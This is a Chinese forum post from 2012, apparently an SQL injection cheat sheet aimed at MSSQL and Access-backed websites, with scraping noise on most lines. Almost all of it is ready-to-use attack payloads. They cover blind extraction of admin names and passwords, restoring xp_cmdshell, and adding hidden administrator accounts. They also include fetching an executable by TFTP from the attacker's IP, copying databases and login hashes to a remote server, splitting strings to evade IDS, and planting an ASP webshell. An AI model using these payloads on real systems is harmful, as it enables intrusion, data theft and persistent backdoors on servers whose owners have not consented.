1..判断有无注入点 # a+ k& L; \2 V8 p) O% f7 ?
; and 1=1 and 1=2
( S4 W7 {: q6 ], O1 P2 l2 y6 I# [ [8 S% y, y, @
9 d% m5 T- G: a2.猜表一般的表的名称无非是admin adminuser user pass password 等..
& }) o- x- }" w) k5 y2 X! eand 0<>(select count(*) from *)
0 j1 Y5 T+ n* w- I' q- d0 Jand 0<>(select count(*) from admin) ---判断是否存在admin这张表 % M. }! }, K) D1 r7 U7 b7 I
- D. X7 S- c9 \) a+ J; R3 O0 _* L' V8 `) I, g7 @" c0 C
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 2 p( x5 U, a# Y0 M
and 0<(select count(*) from admin) 0 ^. Q; M5 I5 r! H
and 1<(select count(*) from admin)
7 k. O2 x! j1 s* o3 X) k q+ W猜列名还有 and (select count(列名) from 表名)>0$ X4 u' B( L4 U: c* V
$ ^8 b$ E' L* ?
" M) f. n, N$ R D# d4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
0 |. G! `! E" l# Qand 1=(select count(*) from admin where len(*)>0)--
, s$ J' n1 s$ |+ [6 E2 Land 1=(select count(*) from admin where len(用户字段名称name)>0)
. t5 a0 o. S5 R& j$ m( Mand 1=(select count(*) from admin where len(密码字段名称password)>0) ( W: [2 D8 v* w5 B
- G! Q1 R& U* z0 Q
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 # u, @4 B& _. O( c* Z
and 1=(select count(*) from admin where len(*)>0) 8 N; u: m4 w. a! \% H
and 1=(select count(*) from admin where len(name)>6) 错误 3 N. a' E0 W5 F( ]3 p5 }7 j
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
4 x6 F4 A- E' D" J p; kand 1=(select count(*) from admin where len(name)=6) 正确
' H" g+ P: |( [5 l1 _
6 F+ B: y) c t; ?" sand 1=(select count(*) from admin where len(password)>11) 正确 1 i5 B; i8 v, G8 V3 n
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
$ D# _2 K, Z, oand 1=(select count(*) from admin where len(password)=12) 正确 ; ^/ J; }' u* u. W/ S
猜长度还有 and (select top 1 len(username) from admin)>5
, s3 |, F2 u) S# G
: U& v% B% V% I# [! k6 U# W4 y% w: r* e+ H+ C" G1 N* q
6.猜解字符
- {+ ~1 M% L r, Aand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 5 g2 s l1 g0 K, Z ]
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
1 R, j6 U) d+ P! y) K6 {9 _) N就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 , x$ e: v5 {# y+ J
2 N' ?' P+ ?4 Y+ D8 L6 q
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算
! i1 c) ? s0 y, w" \and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
- s' `$ ^( B6 E! g) B/ `; t2 o这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
) V! N' p7 g- T1 n4 a b' |0 g8 V* d t
5 w8 z$ h9 e6 N& Agroup by users.id having 1=1-- " \' n- { z% K. h% A! Q3 u6 M
group by users.id, users.username, users.password, users.privs having 1=1--
% w) r( d* G( S0 i$ N: G; insert into users values( 666, attacker, foobar, 0xffff )--
. H$ ~' K1 Z5 U- F7 }( A1 h; c3 n- Z8 _
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
) n2 d( h$ t6 |/ _5 MUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- 4 w8 \8 @* s/ Z0 F6 Q( `# R
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
4 V, O R; w4 y8 q, u# ?- H* U8 V! QUNION SELECT TOP 1 login_name FROM logintable- % A% A* U: w1 i$ M+ t1 C8 z
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- 4 y3 h1 z" D. F9 ~
' A* |* q# J+ i& W( c5 G看服务器打的补丁=出错了打了SP4补丁
9 ^( Z, z3 l8 a1 ~3 s* uand 1=(select @@VERSION)-- 2 G) P: t3 ^: z+ q7 {9 s& a1 i
. T9 Y+ y+ C- Y/ G4 x( j6 D看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
+ x" U6 Z* o+ \- `! e' nand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- $ e3 H1 \$ W% J
9 U) G( D7 c6 @2 O4 i
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
# _9 L- N6 c" B& [+ q+ [and sa=(SELECT System_user)-- : s- |) u! B' k1 K6 r" A
and user_name()=dbo--
" h* E- ~0 V6 N5 @& j% z- Kand 0<>(select user_name()-- - y9 s* M% d: @1 |- S5 }
: i4 g n/ J3 O; {! e0 ]
看xp_cmdshell是否删除 : E- R2 D+ Z& d9 I
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- 6 z9 e- Y+ @2 |. R% @, A* y
6 k, a5 Q; [/ d! t0 M
xp_cmdshell被删除,恢复,支持绝对路径的恢复
% ~& e$ n* p* c$ @' m;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
+ W2 V7 j0 O. o7 d- S8 {$ v;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
' f7 ]" d7 c" {' }1 ]( s/ {" K5 K$ u2 C
反向PING自己实验
9 Q2 A. k2 j7 @: R: {2 R1 M( X6 ?;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
2 u# N' U5 U' n$ W1 o# @2 ]
6 m( v0 I6 {) m, K5 l5 Q6 l1 n; ]加帐号 4 t: y5 o. @1 s$ Y
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
! _6 a a, |4 V$ m" ~/ b1 Y# V8 N+ P- f% H4 {
创建一个虚拟目录E盘: . U, P* K1 r* V
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- & f4 O( ^4 a" q# U+ q9 ^
: z9 N" R1 n, q5 i) J3 R. S( ]8 t& _访问属性:(配合写入一个webshell) s/ k" @! E1 ] ^
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
) Q$ g! H5 F/ s+ P+ L) U( g9 w6 m; `; g" I0 J; \& V! X1 G: T
" |! y8 {4 I( G" ~& ]! T
MSSQL也可以用联合查询
1 ]8 J0 S1 ?1 k0 y8 b; W?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
% n0 Q/ [- w5 M- }?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
# J/ v8 `- x) d" S+ j" u3 ^4 u! o* t! g( F; k4 F K1 A
$ v( i: ^- O0 V) T5 h9 O
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 + ~. p8 |* ~9 v
7 K% x _# t* d3 Q: y8 P9 ~
+ s1 r/ ~9 z1 f, R; {6 A$ P
2 o) K* \2 U1 A" y2 |" w2 ?得到WEB路径 - k. U5 ^, e, Q z- s) d
;create table [dbo].[swap] ([swappass][char](255));--
* G5 |1 |2 A c9 d* `1 D! Jand (select top 1 swappass from swap)=1-- & c5 W0 L4 s5 s
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- , j5 |. ?9 Y* {, x, I7 [+ W
;use ku1;--
2 z/ X0 [( p& g# ^( m& |+ q;create table cmd (str image);-- 建立image类型的表cmd 5 S8 X& z/ Q1 p' U- P: d
; U7 O$ Q) c: U
存在xp_cmdshell的测试过程: ) z w- ?6 t9 s2 }
;exec master..xp_cmdshell dir
$ G2 s1 o% p2 _# z* e: I. _;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
2 {$ `. ~) ], s8 T9 a;exec master.dbo.sp_password null,jiaoniang$,1866574;-- 8 o! r# Y: W8 U% I/ l
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
# c& L3 B; t, P* A. i f;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
9 K: U4 }6 b9 d- }; ?;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- ( m( L( n& N* y2 N. D
exec master..xp_servicecontrol start, schedule 启动服务 # W- Q9 T U' \% {+ G$ {4 j
exec master..xp_servicecontrol start, server 2 [# u6 f# T' u9 B& z/ B. i: T
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add 7 B9 N, k% M1 [8 x% }
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add 1 L5 E2 s. `9 g8 d2 a% F
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 + w) Y5 E1 V; E+ `% k. `
: g; L; l- _2 W$ I4 Q& A9 R! C, T
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
; _2 W N) g# u& C% I. h3 a;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ ( O: V m! ~ q$ p
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
9 L8 g4 m+ U# j: d如果被限制则可以。 . ~; e5 r* t# w; t
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) ! ~5 r7 w$ g- i9 U
2 U. n8 F& x: w% z& c5 O7 C% [查询构造: # H O; O2 I8 a2 b% \) _: m2 r
SELECT * FROM news WHERE id=... AND topic=... AND .....
6 E$ [! s4 `: s* W9 h- ? I& Q" L7 g: madminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 8 Y$ N! a6 t: f4 j" _' p
select 123;-- " r5 ^ W4 X9 F9 y! [* x
;use master;-- 7 P& H3 F1 K2 ^9 U! x
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
. ^( N% g# n% j) l8 z! b% Pand 1<>(select count(email) from [user]);--
; y, s/ _( s2 }5 V9 w( M7 r' p;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- / a& X6 A& ^* T; b' L) n1 G
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
2 |& t) V1 k( y3 n+ M4 p$ K;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
7 N3 m; `1 m: g, y: U) s;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
- _ m$ J+ ?$ k;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
9 ^3 C3 x) ]: X: y: t; B+ A;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- ' G& V2 p1 y, O0 E; e
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 0 w' W2 @5 u( c. s
通过查看ffff的用户资料可得第一个用表叫ad # T2 C9 y" t- x) ^5 @: `! f7 @
然后根据表名ad得到这个表的ID 得到第二个表的名字
$ @) @! x& Y' B0 M) E, X
8 `3 w, U q/ u8 ?; M; M# Xinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
$ t6 Z; K" t" N+ }# Qinsert into users values( 667,123,123,0xffff)-- % \ l/ F; P) X. `1 y* U! E# S- N$ s9 D
insert into users values ( 123, admin--, password, 0xffff)--
6 `% a, O( ]4 N- b+ ?# [/ a- S5 B;and user>0 7 d% K+ J0 c( T8 D) v
;and (select count(*) from sysobjects)>0 $ I- s o9 w" h! G. R
;and (select count(*) from mysysobjects)>0 //为access数据库 % y8 P' g0 {2 E V/ B; g9 `; X# b
, X: I: W" v+ M2 }0 Y L+ v
枚举出数据表名 & g" j+ ]9 [6 S7 e4 Y+ @1 j2 g& [) V
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
$ l' Y4 N1 J) o! R' R- Y这是将第一个表名更新到aaa的字段处。
" N2 E5 T$ p: M% ?( n读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
1 A! v/ y6 N( {3 H* I# H;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- 5 t$ H+ q1 I X G& R
然后id=1552 and exists(select * from aaa where aaa>5)
/ o: X( S; Y) R* z; V1 x! S" L读出第二个表,一个个的读出,直到没有为止。 4 ~+ o3 @; |% n' p" g
读字段是这样: 9 [* a* G/ x) r
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- ; z* P( |! W- ]: j
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 $ n# F- |2 l7 W0 Q
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
8 u, d! }+ }7 N) I然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
& s: B* F5 J1 b& O# F% h
8 R: u' ~6 q' l4 e3 s; @[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
1 @3 o8 f; Q# f7 tupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
; C, ]2 Q: _. q: c3 D3 W7 l6 L通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] : O) T- a8 i2 C! h1 Y6 z0 a
) ^" C. T- K+ j _
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] ) d6 F; A9 [( `7 s3 {4 {5 y
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
) c! M" E4 A+ Q4 Y/ w: r3 R6 L
0 D7 V3 }: S% z9 b' v5 i/ B( o* F1 X绕过IDS的检测[使用变量]
" s; p% m; p) ]' p- D;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
0 Q6 O& h8 k% `5 R( \;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
/ P- Q" R4 Q! a1 I
4 w+ \& j9 a/ c0 y" |( @; e, d% H! K1、 开启远程数据库
, ]: _7 ]$ z( P( x, W$ X基本语法
1 D6 B. N: D E5 N: u" Tselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) / _+ }7 j9 `8 c) x) a5 n
参数: (1) OLEDB Provider name
' G& y8 l) a& ?5 \1 |7 z! K2、 其中连接字符串参数可以是任何端口用来连接,比如 4 j/ ?5 Q7 {: N& V8 d% z' G9 L+ @
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table 7 I4 u5 N6 p) O1 j4 K8 y
3.复制目标主机的整个数据库insert所有远程表到本地表。
" E% x8 Z9 W, ~9 z( C& I v
. ~/ |! R3 a( c( j; h% p, Y" N基本语法:
( ?- s k6 C5 _) a) z% G linsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
; i! f' t; a* X1 K$ x: s, Y这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: 3 F( U# O* C0 `2 F3 c
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 $ I; j" l0 W/ ~. n8 d# T! b
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) Z9 Y) i v/ @# r* S
select * from master.dbo.sysdatabases / y1 ~, m1 h3 W- R6 p
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
% _5 B9 [* G9 Y* Q6 ^) V( |. Wselect * from user_database.dbo.sysobjects
* D8 T: v9 f1 K5 T4 ^8 b7 Iinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 5 |) _3 T- C1 f E6 p
select * from user_database.dbo.syscolumns
- W* [1 s; ^& C z+ O9 v$ M0 O复制数据库:
( D0 E1 N. M+ \" G0 { j! v* Qinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 2 P0 B! a/ q9 f' |# O3 P
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 . b2 u! d* D% N
( @( b7 g0 y5 u" X# r复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: \7 j, n* j3 @$ Y
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins 1 J6 P+ d8 g1 X% L4 M
得到hash之后,就可以进行暴力破解。 ) Q. Y: l6 C( A3 T6 j: c/ m; ~
+ {) m: F: I& M! `" v$ t
遍历目录的方法: 先创建一个临时表:temp
9 I! E" Z6 @: t$ N: {; U;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
9 X! D2 P, r0 U" `;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
; Z# z% O C- ~2 y;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
2 w7 h% A' B% P;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
1 N& v0 j- p E% P8 |2 B;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
* K6 d8 s( n& u;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
4 V. X# k) i* V6 p/ V;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
( C: k$ _7 P0 n- I2 Z3 X# i8 s;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
& I6 f+ _- {6 Z1 N3 B; w% g4 a9 z;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
7 _4 F6 e5 l Q+ @写入表:
9 [- W5 C* p- o# b语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- & a! `2 g2 |- [* s& \7 Z
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- # R9 p* H- W# g) V( w2 e0 V# M
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- 1 I/ \; x, \: }- z. Y
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
6 g, ?( j+ E* Y3 z5 _" f6 r8 O语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- Z2 ` n2 J* c9 F- W# l8 g
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
" u+ B1 C3 r0 t. O语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
7 h3 u6 S7 c% c& f8 L+ D: q语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- / x# }+ C0 c- l
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- $ c! e7 `9 ^$ C6 @& f, O
, {. A: i# S; s6 J% {3 A+ Z把路径写到表中去:
9 e! u' s' p+ M+ w) O$ B/ c;create table dirs(paths varchar(100), id int)--
7 k. c, r$ }* j1 R;insert dirs exec master.dbo.xp_dirtree c:\-- % T% [; @* l4 T% g" o3 N
and 0<>(select top 1 paths from dirs)--
$ G6 U1 X& P% A1 jand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- % _/ P4 T2 O# R# c# I# } ~
;create table dirs1(paths varchar(100), id int)--
, O* p8 U4 P5 a/ Z;insert dirs exec master.dbo.xp_dirtree e:\web--
3 E$ Y1 \3 d" J* K8 L: \; Q( a v7 t) jand 0<>(select top 1 paths from dirs1)--
& `9 H+ o: W+ e4 j
+ Q& @7 x8 w: N6 L- |9 L把数据库备份到网页目录:下载
" E( j/ h) U1 r" ^4 u;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- ( ^2 @; A# y6 Q- R, f9 ]
: B4 Y" p5 o3 _; W/ p& {* ]" W5 w$ M
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
1 ]( H* w5 _- F5 @and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 . T6 Q' d6 W! g' t, }
and 1=(select user_id from USER_LOGIN)
9 V2 ^0 h$ x" J( u# x5 c8 s, Aand 0=(select user from USER_LOGIN where user>1) ' Z' X8 s! Q( w% k
- Q) c+ K7 ~' ~-=- wscript.shell example -=- - {6 u1 B6 l0 @+ X+ T% l8 S* G/ N% ^
declare @o int " Y% k# `6 ^# q7 `
exec sp_oacreate wscript.shell, @o out 5 |( Z- P7 _1 a- p& m
exec sp_oamethod @o, run, NULL, notepad.exe & d5 Q) A$ E+ K2 u. t6 F
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
* q6 ?4 X7 |) B) ~
" N+ n/ `6 O0 F0 |. kdeclare @o int, @f int, @t int, @ret int
* ` h% W4 l4 D$ v a/ v" ~) jdeclare @line varchar(8000) ! h% j' O4 ~" ~0 U6 M$ \) A; O
exec sp_oacreate scripting.filesystemobject, @o out
7 J2 I) x, v0 ?7 Zexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 8 y& P5 f K# G- t
exec @ret = sp_oamethod @f, readline, @line out
8 }9 L/ V2 T+ d! b, Nwhile( @ret = 0 )
3 ?- [+ R" @/ D$ k, |+ ?begin
9 ~* C' C" }4 D s" N# U! o# Gprint @line
+ }: _9 @& B X7 gexec @ret = sp_oamethod @f, readline, @line out + h3 w4 M1 g k5 L! v2 G
end 3 M5 n0 h" l1 p
# I/ ?. A' M$ U) fdeclare @o int, @f int, @t int, @ret int . W; L! d ?% W2 J& p( f
exec sp_oacreate scripting.filesystemobject, @o out
, l, |# p7 b' `6 Rexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 2 o6 }" C% t' C9 `
exec @ret = sp_oamethod @f, writeline, NULL, , ?# v- i: k4 O
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
* C; z' f9 a9 y! ~4 Q5 V2 i1 G
. M4 i% K7 k! o9 u+ d& N* odeclare @o int, @ret int
1 O$ D3 U* S, Eexec sp_oacreate speech.voicetext, @o out
- z& n8 L p# Q% f1 j8 M3 E% J! Bexec sp_oamethod @o, register, NULL, foo, bar
1 z! ]7 t3 `3 ?* ]( P! n1 V4 cexec sp_oasetproperty @o, speed, 150
7 Y* Z% F9 J9 t9 }+ w% s) texec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 * U( e" N- q4 \. J- ` O' k' ]: P
waitfor delay 00:00:05 7 {. u( }! r2 T v7 R1 [9 O
' M6 T, E: G& l; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
3 P1 Z9 D4 Y0 E0 @. r9 b! U. |1 H% X5 ?& m7 G5 z! \
xp_dirtree适用权限PUBLIC
- R8 \* `' q$ r. ?exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 1 Y9 `! m% ^$ r: X) z
create table dirs(paths varchar(100), id int) 4 ?' i4 i$ `, r9 F) M& S, w( T" V
建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
0 ^7 s% B# ^* [: z6 oinsert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
: v% P0 K4 e! Y/ O' s |
发表于 2012-9-15 14:32:40
收藏
支持
反对